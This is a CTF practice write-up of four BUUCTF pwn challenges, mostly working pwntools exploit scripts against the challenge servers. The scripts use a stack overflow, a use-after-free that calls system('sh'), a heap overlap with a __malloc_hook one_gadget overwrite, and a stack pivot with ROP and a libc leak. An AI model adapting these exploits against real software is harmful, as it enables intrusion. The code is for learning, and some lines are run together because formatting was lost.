PWN-PRACTICE-BUUCTF-14
- bbys_tu_2016
- ciscn_2019_n_3
- roarctf_2019_easy_pwn
- gyctf_2020_borrowstack
bbys_tu_2016
栈溢出,覆盖eip到printFlag函数
from pwn import *
#io=process('./bbys_tu_2016')
io=remote('node4.buuoj.cn',27817)
elf=ELF('./bbys_tu_2016')
#io.recvuntil('feed it.\n')
payload='a'*(24)+p32(0x0804856D)
io.sendline(payload)
io.interactive()
ciscn_2019_n_3
参考:[BUUCTF]PWN——ciscn_2019_n_3
from pwn import *
#context.log_level="debug"
io=remote("node4.buuoj.cn",29097)
#io=process("./ciscn_2019_n_3")
elf=ELF("./ciscn_2019_n_3")def new(index,btype,cont,cont_len=0):io.sendlineafter("CNote > ","1")io.sendlineafter("Index > ",str(index))if btype==1:io.sendlineafter("Type > ",str(btype))io.sendlineafter("Value > ",cont)else:io.sendlineafter("Type > ",str(btype))io.sendlineafter("Length > ",str(cont_len))io.sendlineafter("Value > ",cont)
def delete(index):io.sendlineafter("CNote > ","2")io.sendlineafter("Index > ",str(index))
def show(index):io.sendlineafter("CNote > ","3")io.sendlineafter("Index > ",str(index))#gdb.attach(io)
#pause()new(0,1,"1")
new(1,1,"1")
new(2,1,"1")#pause()delete(0)
delete(1)#pause()system_plt=elf.plt["system"]
print(hex(system_plt))
payload="sh\x00\x00"+p32(system_plt)
new(3,2,payload,0xc)#pause()delete(0)io.interactive()
roarctf_2019_easy_pwn
参考:【pwn】roarctf_2019_easy_pwn
from pwn import *
#context.log_level="debug"
#io=process("./roarctf_2019_easy_pwn")
io=remote("node4.buuoj.cn",28680)
elf=ELF("./roarctf_2019_easy_pwn")
libc=ELF("./libc-2.23-16-x64.so")
def create(size):io.sendlineafter("choice: ","1")io.sendlineafter("size: ",str(size))
def write(index,size,content):io.sendlineafter("choice: ","2")io.sendlineafter("index: ",str(index))io.sendlineafter("size: ",str(size))io.sendlineafter("content: ",content)
def drop(index):io.sendlineafter("choice: ","3")io.sendlineafter("index: ",str(index))
def show(index):io.sendlineafter("choice: ","4")io.sendlineafter("index: ",str(index))#gdb.attach(io)
#pause()create(0x18)#chunk0
create(0x18)#chunk1
create(0x88)#chunk2
create(0x88)#chunk3
create(0x28)#chunk4
create(0x28)#chunk5
create(0x68)#chunk6#pause()write(0,0x18+10,"a"*0x18+p8(0xb1))
drop(1)#pause()create(0xa8)#chunk1
write(1,0x20,"a"*0x18+p64(0x91))#pause()drop(2)
show(1)
io.recvuntil("content: ")
io.recv(0x20)
libc_base=u64(io.recv(8))-0x3C4B78
print(hex(libc_base))
malloc_hook=libc_base+libc.sym["__malloc_hook"]
realloc=libc_base+libc.sym["__libc_realloc"]
libc_one_gadget=[0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget=libc_base+libc_one_gadget[1]#pause()write(4,0x28+10,"a"*0x28+p8(0xa1))
drop(5)
drop(6)#pause()create(0x98)#chunk2
payload="a"*0x28+p64(0x71)+p64(malloc_hook-0x23)
write(2,len(payload),payload)#pause()create(0x68)#chunk5
create(0x68)#chunk6
payload="a"*(0x13-8)+p64(one_gadget)+p64(realloc+0x10)
write(6,len(payload),payload)#pause()create(0x88)io.interactive()
gyctf_2020_borrowstack
栈迁移,到.bss段
但是要尽量往高地址处迁移,避免再次执行main函数时,申请的临时变量的空间覆盖got表
from pwn import *
#context.log_level='debug'
#io=process('./gyctf_2020_borrowstack')
io=remote('node4.buuoj.cn',25331)
elf=ELF('./gyctf_2020_borrowstack')
libc=ELF('./libc-2.23-x64.so')
bank_addr=0x601080
leave_ret=0x400699
pop_rdi=0x400703
ret=0x4004c9
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main_addr=elf.sym['main']
io.recvuntil('what you want\n')
payload0='a'*(0x60)+p64(bank_addr)+p64(leave_ret)
io.send(payload0)
io.recvuntil('stack now!\n')
payload1=p64(ret)*20+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.send(payload1)
puts_addr=u64(io.recv(6).ljust(8,'\x00'))
print(hex(puts_addr))
libc_base=puts_addr-libc.sym['puts']
ones=[0x45216,0x4526a,0xf02a4,0xf1147]
onegadget=libc_base+ones[1]
io.recvuntil('you want\n')
payload2='a'*(0x60+8)+p64(onegadget)
io.send(payload2)
io.recvuntil('stack now!')
io.send('1')
io.interactive()
)
)
)
